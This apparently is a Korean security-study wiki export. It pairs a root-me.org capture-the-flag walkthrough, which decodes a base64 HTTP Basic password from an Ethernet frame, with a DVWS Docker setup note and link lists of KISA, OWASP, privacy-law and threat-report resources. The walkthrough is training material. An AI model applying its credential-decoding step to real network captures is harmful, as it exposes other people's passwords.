> Note: There will be no vendor shaming. All Vendors will be renamed to “Vendor A, Vendor B, Vendor C…etc”
>
> Bio: Elvis Collado is a Senior Security Researcher for Praetorian with a main focus in embedded electronics. Elvis got into electronics ever since he discovered his first vulnerabilities in some of the devices he personally owned. He decided to migrate his research from the desktop space to the embedded space and wants to share what he has learned with everyone.

{% embed url="<https://youtu.be/r4XntiyXMnA>" %}
시연 영상      &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# \[root-me.org] 시스템 취약점 및 다양한 취약점에 대한 연습할 수 있는 사이트

\[Root-ME.Org] Web/System Test Site

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 1. Root-ME.Org 는무엇인가?&#x20;

> Root-Me 사이트[(바로가기)](https://www.root-me.org/)는 다양한 취약점이나 조그마한 단서를 주어 취약한 부분을 찾는 Site 입니다.
>
> 11가지 종류와 세부의 다양한 연습문제를 제공 하여 풀어 나갈 수 있게 하고 있습니다.

## 2. 사용 방법  &#x20;

### 2.1 가입 절차  &#x20;

> 가입절차는 이메일 인증후에 로그인 하여 접속 하시면 됩니다.
>
> \* Root-Me.org 페이지 입니다. 가입절차는 간단합니다.

![그림. 가입    ](https://t1.daumcdn.net/cfile/tistory/2454364E583FC9442C)

> \* 인증메일을 받은 후에 사이트에 로그인을 하면 아래와 같은 화면을 보여 줍니다.

![그림. 가입 후 로그인      ](https://t1.daumcdn.net/cfile/tistory/260CC547583FC97B09)

### 2.2 연습 방법  &#x20;

> \* Challenges 의 카테고리 안에 다양한 연습을 할 수 있는 페이지가 나옵니다. \[Challenges > Networks 로 접근 합니다.]
>
> &#x20; 간단한 문제인 \[ETHERNET - frame] 를 문제를 풀어 보겠습니다.
>
> &#x20; 내용을 보면은 Frame analysis 이며 Statement 의 문제에서 Password 구문을 찾는 것입니다.

![그림. 연습 문제      ](https://t1.daumcdn.net/cfile/tistory/262A2847583FCA4620)

### 2.3 연습 문제 해결 방법  &#x20;

> \* 이 문제를 해결 하기 위해 16진수를 문자열로 바꾸는 작업이 필요 합니다.
>
> &#x20; 구글에서 16진수 문자열변환을 찾아 보면시거나 pcap을 이용하여 확인 하시면 됩니다.
>
> &#x20; 웹에서 바로 변환해 주는 사이트([바로가기)](https://www.percederberg.net/tools/text_converter.html)를 찾았습니다.

![그림. 16 진수 문자열 변경         ](https://t1.daumcdn.net/cfile/tistory/2665B450583FCBC41A)

> \* Authorization 의 값을 확인 할 수 있습니다. Base 다음에 나오는 문자열이 password 구문이며 이 문자열은 base64 로 인코딩 되어 있습니다. 해당 문자열을 디코딩 해 보면 아래와 같은 결과 값이 나옵니다. base64 디코더 사이트[(바로가기)](http://www.convertstring.com/EncodeDecode/Base64Decode)

![그림. Base64 디코딩       ](https://t1.daumcdn.net/cfile/tistory/2373AF50583FCC3704)

## 3. 문제 확인 제출    &#x20;

### 3.1 제출 방법  &#x20;

> \* 디코딩 된 정보를 root-me.org 사이트에 아래와 같이 입력 합니다.

![그림. Validation 제출   ](https://t1.daumcdn.net/cfile/tistory/2215594B583FCD1916)

### 3.2 틀린 답을 제출 하였을때      &#x20;

> \* Validation 의 값을 틀리게 입력 하였을때 아래와 같이 발생 됩니다.

![그림. 틀린 답을 제출 한 화면         ](https://t1.daumcdn.net/cfile/tistory/2646C94B583FCD7836)

### 3.3 정답 제출   &#x20;

> \* 정상적 답을 입력 하였을때 아래와 같이 보여줍니다. 10Point 를 주네요.

![그림. 정답 제출 화면        ](https://t1.daumcdn.net/cfile/tistory/23316A48583FCDA71A)

## 4. Callenges 화면&#x20;

> \* Challenges > Network 로 들어가 보시면 \[ETHERNET - frame] 이 해결이 되었네요.

![그림. 해결된 문제         ](https://t1.daumcdn.net/cfile/tistory/2732AA50583FCE0F29)

{% hint style="success" %}
간단한 문제는 시간이 오래 걸리지 않네요. 관심 있는 분들은 한번씩 풀어 보시기 바랍니다.
{% endhint %}

## 5. 참고 Site

> Root Me Site : [https://www.root-me.org](https://www.root-me.org/)
>
> 16진수를 문자열로 변경 Site : <https://www.percederberg.net/tools/text_converter.html>
>
> Base64 디코딩 Site : [http://www.convertstring.com/EncodeDecode/Base64Decode﻿](http://www.convertstring.com/EncodeDecode/Base64Decode)

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# Damn Vulnerable Web Services (DVWS) using Docker

\[Youtube Data] Public Data - \[DVWS using Docker]

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 :  Damn Vulnerable Web Services (DVWS) using Docker

{% hint style="danger" %}
**주의 : 테스트 이외의 목적으로 발생 되는 문제점에 대해서는 프로그램을 사용하는 사용자가 책임을 지셔야 한다는 것을 알려 드립니다.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### 내용 : &#x20;

> Docker 를 이용하여 웹 해킹을 연습 할 수 있는 DVWS 를 빠르게 설치 할 수 있습니다.    &#x20;
>
> DVWS 를 이용하여 다양한 웹 해킹에 대한 연습을 할 수 있습니다.                  &#x20;

### Infomation :&#x20;

> GitHub : <https://github.com/snoopysecurity/dvws-node>

{% embed url="<https://youtu.be/XBZK_fPidx0>" %}
시연 영상     &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}


# \[KISA] 2022년도 암호모듈검증(KCMVP) 전문교육 신청·접수 안내

\[보안/해킹] 무료 교육 공유

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고 &#x20;
{% endembed %}

## □ 제목 : \[KISA] 2022년도 암호모듈검증(KCMVP) 전문교육 신청·접수 안내

> 암호모듈검증(KCMVP) 전문가 양성을 위한 "암호모듈검증(KCMVP) 전문교육"을 무료로 실시할 예정이오니, 관심있는 분들의 많은 참여 부탁드립니다.

## &#x20;□ 교육일시

> * 2022\. 5. 16(월) \~ 5. 20(금) (온라인 스트리밍)

## □ 교육내용

> * 기초 암호수학(1일차)
>   * 기초 정수론, 유한체 이론, 유클리디안 알고리즘 등
> * 검증대상 암호 알고리즘(2\~3일차)
>   * 블록암호와 운영모드, 해시함수, 메시지인증 등&#x20;
>   * 공개키 암호, 전자서명, 키 유도 등 검증대상 암호 알고리즘
> * 암호모듈검증 기준 해설(4\~5일차 오전)
>   * KCMVP 제도 소개, CAVP 시험방법론
>   * 암호모듈검증 기준 해설
> * 암호모듈검증 구현 안내서 및 제출물 작성 가이드 안내(5일차 오후)

## □ 교육대상

> * 암호제품 개발업체, 대학원(생) 등 암호모듈검증에 관심 있는 누구나

## □ 신청기간

> * 2022\. 4. 20(수) 8시 \~ 5. 4(수) 18시

## □ 신청방법

> * 아래의 링크 또는 포스터 QR코드를 통해 교육 신청
>
> &#x20;      ※ 신청 링크 : <https://naver.me/5K8UTzmR>

## □ 교육확정 안내

> * 2022\. 5. 6(금) 교육수강 대상자 개별 메일을 통해 교육 안내 예정

## □ 문의처

> * [031-751-9088/gracechang@coontec.com(쿤텍(주](mailto:031-751-9088/gracechang@coontec.com\(%EC%BF%A4%ED%85%8D\(%EC%A3%BC)))

![그림. 모집 내용        ](https://2048856634-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FZPXWYK5WXOE2Vq7WVulN%2Fuploads%2FwOaYLjC1xVOWZIQmFpO6%2Fimage.png?alt=media\&token=beeeb21e-95b5-42a2-9130-c67f16ca5da7)

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고 &#x20;
{% endembed %}


# KISA Secure Report - List

KISA 자료 목차 리스트

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : KISA Secure Report

### [리스트 1. 2021년\_주요정보통신기반시설\_기술적\_취약점\_분석\_평가\_방법\_상세 가이드](https://www.kisa.or.kr/post/fileDownload?menuSeq=2060204\&postSeq=12\&attachSeq=1\&lang_type=KO)&#x20;

### [리스트 2. 2019년\_공개SW를\_활용한\_소프트웨어\_개발보안\_점검가이드](https://www.kisa.or.kr/post/fileDownload?menuSeq=2060204\&postSeq=10\&attachSeq=1\&lang_type=KO)

### [리스트 3.  2019년\_모바일\_전자정부서비스\_앱\_소스코드\_검증\_가이드라인](https://www.kisa.or.kr/post/fileDownload?menuSeq=2060204\&postSeq=3\&attachSeq=1\&lang_type=KO)

### [리스트 4. 2021년\_소프트웨어\_개발보안\_가이드](https://www.kisa.or.kr/post/fileDownload?menuSeq=2060204\&postSeq=5\&attachSeq=1\&lang_type=KO)

### [리스트 5. 2021년\_소프트웨어\_보안약점\_진단가이드](https://www.kisa.or.kr/post/fileDownload?menuSeq=2060204\&postSeq=9\&attachSeq=1\&lang_type=KO)

### [리스트 6. 2021년\_Python\_시큐어코딩\_가이드](https://www.kisa.or.kr/post/fileDownload?menuSeq=2060204\&postSeq=13\&attachSeq=1\&lang_type=KO)

### [리스트 7. 2015년\_모바일\_대민서비스\_보안취약점\_점검\_가이드](https://www.kisa.or.kr/post/fileDownload?menuSeq=2060204\&postSeq=4\&attachSeq=1\&lang_type=KO)  &#x20;

### [리스트 8. WebKnight 3.1 사용설명서](https://www.krcert.or.kr/filedownload.do?attach_file_seq=757\&attach_file_id=EpF447.pdf) &#x20;

### [리스트 9. ModSecurity 사용설명서   ](https://www.krcert.or.kr/filedownload.do?attach_file_seq=805\&attach_file_id=EpF202.pdf) &#x20;

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고 &#x20;
{% endembed %}


# OWASP - List

OWASP 자료 목차 리스트

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : OWASP

### [리스트 1. OWASP Top 10 (Eng-Link)\\](https://owasp.org/Top10/)  &#x20;

### [리스트 2. OWASP 2021's Top 10 (Eng-Link)](https://owasp.org/www-project-top-ten/)

### [리스트 3. OWASP 2021's Top 10 (Eng-PDF-Download)](https://owasp.org/www-chapter-minneapolis-st-paul/download/20211216_OWASP_Top_Ten_2021.pdf)

### [리스트 4. OWASP 2017's Top 10 (Kor-PDF-Download)](https://wiki.owasp.org/?title=Special:Redirect/file/OWASP_Top_10-2017-ko.pdf)

### [리스트 5. OWASP 2017's Top 10 (Kor-PPTS-Download)](https://wiki.owasp.org/?title=Special:Redirect/file/OWASP_Top_10-2017-ko.pptx)

### [리스트 6. OWASP 2013's Top 10 (Kor-PDF-Download)](https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf)

### [리스트 7. OWASP 2010's Top 10 (Kor-PDF-Download)](https://torage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf)

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}


# PRIVACY LAW DATA - List

Privacy Law 자료 목차 리스트

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 :  PRIVACY LAW DATA

### [리스트 1. 개인정보\_보호법](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%EB%B2%95)

### [리스트 2. 개인정보\_보호법\_시행령](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%EB%B2%95%20%EC%8B%9C%ED%96%89%EB%A0%B9)

### [리스트 3. 신용정보의\_이용\_및\_보호에\_관한\_법률](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EC%8B%A0%EC%9A%A9%EC%A0%95%EB%B3%B4%EC%9D%98%20%EC%9D%B4%EC%9A%A9%20%EB%B0%8F%20%EB%B3%B4%ED%98%B8%EC%97%90%20%EA%B4%80%ED%95%9C%20%EB%B2%95%EB%A5%A0)

### [리스트 4. 국가인권위원회법](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EA%B5%AD%EA%B0%80%EC%9D%B8%EA%B6%8C%EC%9C%84%EC%9B%90%ED%9A%8C%EB%B2%95)

### [리스트 5. 공공기관의\_운영에\_관한\_법률](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EA%B3%B5%EA%B3%B5%EA%B8%B0%EA%B4%80%EC%9D%98%20%EC%9A%B4%EC%98%81%EC%97%90%20%EA%B4%80%ED%95%9C%20%EB%B2%95%EB%A5%A0)

### [리스트 6. 지방공기업법](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EC%A7%80%EB%B0%A9%EA%B3%B5%EA%B8%B0%EC%97%85%EB%B2%95)

### [리스트 7. 초·중등교육법](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EC%B4%88%C2%B7%EC%A4%91%EB%93%B1%EA%B5%90%EC%9C%A1%EB%B2%95)

### [리스트 8. 고등교육법](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EA%B3%A0%EB%93%B1%EA%B5%90%EC%9C%A1%EB%B2%95)

### [리스트 9. 주민등록법](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EC%A3%BC%EB%AF%BC%EB%93%B1%EB%A1%9D%EB%B2%95)

### [리스트 10. 전자정부법](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EC%A0%84%EC%9E%90%EC%A0%95%EB%B6%80%EB%B2%95)

### [리스트 11.  전자서명법](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EC%A0%84%EC%9E%90%EC%84%9C%EB%AA%85%EB%B2%95)&#x20;

### [리스트 12. 공공기관의\_정보공개에\_관한\_법률](http://www.law.go.kr/%EB%B2%95%EB%A0%B9/%EA%B3%B5%EA%B3%B5%EA%B8%B0%EA%B4%80%EC%9D%98%20%EC%A0%95%EB%B3%B4%EA%B3%B5%EA%B0%9C%EC%97%90%20%EA%B4%80%ED%95%9C%20%EB%B2%95%EB%A5%A0)&#x20;

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}


# PRIVACY Administrative-RULE - List

PRIVACY Administrative-RULE 자료 목차 리스트

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : PRIVACY Administrative-RULE &#x20;

### [리스트 1. 개인정보\_처리\_방법에\_관한\_고시](http://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EC%B2%98%EB%A6%AC%EB%B0%A9%EB%B2%95%EC%97%90%EA%B4%80%ED%95%9C%EA%B3%A0%EC%8B%9C/\(2020-7,20200811\))

### [리스트 2. 개인정보의\_안전성\_확보조치\_기준](http://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/\(%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%9C%84%EC%9B%90%ED%9A%8C\)%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EC%9D%98%EC%95%88%EC%A0%84%EC%84%B1%ED%99%95%EB%B3%B4%EC%A1%B0%EC%B9%98%EA%B8%B0%EC%A4%80/\(2020-2,20200811\))

### [리스트 3. 개인정보의\_기술적ㆍ관리적\_보호조치\_기준](http://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/\(%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%9C%84%EC%9B%90%ED%9A%8C\)%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EC%9D%98%EA%B8%B0%EC%88%A0%EC%A0%81%C2%B7%EA%B4%80%EB%A6%AC%EC%A0%81%EB%B3%B4%ED%98%B8%EC%A1%B0%EC%B9%98%EA%B8%B0%EC%A4%80/\(2020-5,20200811\))

### [리스트 4. 표준\_개인정보\_보호지침](http://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/\(%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%9C%84%EC%9B%90%ED%9A%8C\)%ED%91%9C%EC%A4%80%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%A7%80%EC%B9%A8/\(2020-1,20200811\))

### [리스트 5. 개인정보\_영향평가에\_관한\_고시](http://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/\(%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%9C%84%EC%9B%90%ED%9A%8C\)%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EC%98%81%ED%96%A5%ED%8F%89%EA%B0%80%EC%97%90%EA%B4%80%ED%95%9C%EA%B3%A0%EC%8B%9C/\(2020-4,20200811\))

### [리스트 6. 개인정보\_보호\_자율규제단체\_지정\_등에\_관한\_규정](http://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/\(%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%9C%84%EC%9B%90%ED%9A%8C\)%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%9E%90%EC%9C%A8%EA%B7%9C%EC%A0%9C%EB%8B%A8%EC%B2%B4%EC%A7%80%EC%A0%95%EB%93%B1%EC%97%90%EA%B4%80%ED%95%9C%EA%B7%9C%EC%A0%95/\(2020-3,20200811\))

### [리스트 7. 정보보호\_및\_개인정보보호\_관리체계\_인증\_등에\_관한\_고시](http://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/\(%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%9C%84%EC%9B%90%ED%9A%8C\)%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EB%B0%8F%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EA%B4%80%EB%A6%AC%EC%B2%B4%EA%B3%84%EC%9D%B8%EC%A6%9D%EB%93%B1%EC%97%90%EA%B4%80%ED%95%9C%EA%B3%A0%EC%8B%9C/\(2020-8,20200811\))

### [리스트 8. 가명정보의\_결합\_및\_반출\_등에\_관한\_고시](https://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/%EA%B0%80%EB%AA%85%EC%A0%95%EB%B3%B4%EC%9D%98%EA%B2%B0%ED%95%A9%EB%B0%8F%EB%B0%98%EC%B6%9C%EB%93%B1%EC%97%90%EA%B4%80%ED%95%9C%EA%B3%A0%EC%8B%9C/\(2021-4,20211005\))

### [리스트 9. 공공기관의\_가명정보\_결합\_및\_반출\_등에\_관한\_고시](https://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/%EA%B3%B5%EA%B3%B5%EA%B8%B0%EA%B4%80%EC%9D%98%EA%B0%80%EB%AA%85%EC%A0%95%EB%B3%B4%EA%B2%B0%ED%95%A9%EB%B0%8F%EB%B0%98%EC%B6%9C%EB%93%B1%EC%97%90%EA%B4%80%ED%95%9C%EA%B3%A0%EC%8B%9C/\(2020-11,20201202\))

### [리스트 10. 경찰청\_개인정보\_보호\_규칙](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EA%B2%BD%EC%B0%B0%EC%B2%AD%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%20%EA%B7%9C%EC%B9%99#liBgcolor0)

### [리스트 11. 경찰청\_영상정보처리기기\_운영규칙](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EA%B2%BD%EC%B0%B0%EC%B2%AD%20%EC%98%81%EC%83%81%EC%A0%95%EB%B3%B4%EC%B2%98%EB%A6%AC%EA%B8%B0%EA%B8%B0%20%EC%9A%B4%EC%98%81%EA%B7%9C%EC%B9%99#liBgcolor0)

### [리스트 12. 주민등록증발급신청서등의\_관리에\_관한\_규칙](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EC%A3%BC%EB%AF%BC%EB%93%B1%EB%A1%9D%EC%A6%9D%EB%B0%9C%EA%B8%89%EC%8B%A0%EC%B2%AD%EC%84%9C%EB%93%B1%EC%9D%98%20%EA%B4%80%EB%A6%AC%EC%97%90%20%EA%B4%80%ED%95%9C%20%EA%B7%9C%EC%B9%99#liBgcolor0)  &#x20;

### [리스트 13. 국토교통부\_개인정보보호\_세부지침](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EA%B5%AD%ED%86%A0%EA%B5%90%ED%86%B5%EB%B6%80%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%20%EC%84%B8%EB%B6%80%EC%A7%80%EC%B9%A8#liBgcolor0)

### [리스트 14. 기상청\_개인정보\_보호지침](http://www.kma.go.kr/notify/information/law_instruction_list.jsp?bid=lawinst\&mode=view\&num=454\&page=1\&field=\&text=)

### [리스트 15. 농림축산식품부\_개인정보보호지침](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EB%86%8D%EB%A6%BC%EC%B6%95%EC%82%B0%EC%8B%9D%ED%92%88%EB%B6%80%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%A7%80%EC%B9%A8#liBgcolor0)

### [리스트 16. 문화체육관광부\_개인정보\_보호지침](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EB%AC%B8%ED%99%94%EC%B2%B4%EC%9C%A1%EA%B4%80%EA%B4%91%EB%B6%80%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%EC%A7%80%EC%B9%A8#liBgcolor0)

### [리스트 17. 법무부\_개인정보\_보호지침](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EB%B2%95%EB%AC%B4%EB%B6%80%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%EC%A7%80%EC%B9%A8#liBgcolor0)  &#x20;

### [리스트 18. 병무행정\_정보업무\_관리규정](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EB%B3%91%EB%AC%B4%ED%96%89%EC%A0%95%20%EC%A0%95%EB%B3%B4%EC%97%85%EB%AC%B4%20%EA%B4%80%EB%A6%AC%EA%B7%9C%EC%A0%95#liBgcolor0)

### [리스트 19. 산림청\_개인정보\_보호지침](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EC%82%B0%EB%A6%BC%EC%B2%AD%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%EC%A7%80%EC%B9%A8#liBgcolor0)

### [리스트 20. 중소벤처기업부\_개인정보\_보호지침](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%EC%A4%91%EC%86%8C%EB%B2%A4%EC%B2%98%EA%B8%B0%EC%97%85%EB%B6%80%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%EC%A7%80%EC%B9%A8#liBgcolor0)

### [리스트 21. 통계청\_개인정보보호\_지침](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%ED%86%B5%EA%B3%84%EC%B2%AD%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%EC%A7%80%EC%B9%A8#liBgcolor0)

### [리스트 22. 행정안전부\_개인정보보호\_지침](https://www.law.go.kr/admRulSc.do?menuId=5\&subMenuId=41\&tabMenuId=183\&query=%ED%96%89%EC%A0%95%EC%95%88%EC%A0%84%EB%B6%80%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%20%EC%A7%80%EC%B9%A8#liBgcolor0)

### [리스트 23. 환경부\_개인정보\_보호지침](http://www.law.go.kr/admRulLsInfoP.do?admRulSeq=2100000015767\&langType=Ko\&joTpYn=Y\&chrClsCd=010202\&vSct=%ED%99%98%EA%B2%BD%EB%B6%80%20%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%20%EB%B3%B4%ED%98%B8%EC%A7%80%EC%B9%A8)

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}


# Secure Trend Report

보안 동향보고서 모음 자료

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## 제목 : Secure Trend Report &#x20;

### [리스트 1. 사이버 위협 동향보고서(2021년 상반기)  ](https://krcert.or.kr/filedownload.do?attach_file_seq=2957\&attach_file_id=EpF2957.pdf)      &#x20;

### [리스트 2. 사이버 위협 동향보고서(2021년 하반기)](https://krcert.or.kr/filedownload.do?attach_file_seq=3488\&attach_file_id=EpF3488.pdf)&#x20;

### [리스트 3. 2021년 상반기 악성코드 은닉사이트 탐지 동향 보고서](https://krcert.or.kr/filedownload.do?attach_file_seq=3169\&attach_file_id=EpF3169.pdf) &#x20;

### [리스트 4. 2021년 하반기 악성코드 은닉사이트 탐지 동향 보고서   ](https://krcert.or.kr/filedownload.do?attach_file_seq=3516\&attach_file_id=EpF3516.pdf)

### [리스트 5. 2021년 랜섬웨어 스페셜 리포트](https://krcert.or.kr/filedownload.do?attach_file_seq=3278\&attach_file_id=EpF3278.pdf)  &#x20;

### [리스트 6. cyber security advisory 2022](https://krcert.or.kr/filedownload.do?attach_file_seq=3505\&attach_file_id=EpF3505.pdf)  &#x20;

{% hint style="info" %}
**2022년 NHN Cloud&#x20;**<mark style="color:red;">**무료**</mark>**&#x20;교육일정** : <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

{% embed url="<https://www.11st.co.kr/?adpick_uid=ap_c16a2_22f902_be11efc9588382b7221b4b85d46d5a3161651279040>" %}
광고  &#x20;
{% endembed %}


# \[KISA] ISMS/ISMS-P 관련 정보

\[KISA] 한국인터넷진흥원 ISMS/ISMS-P 정보 (모음 자료)

{% hint style="info" %}
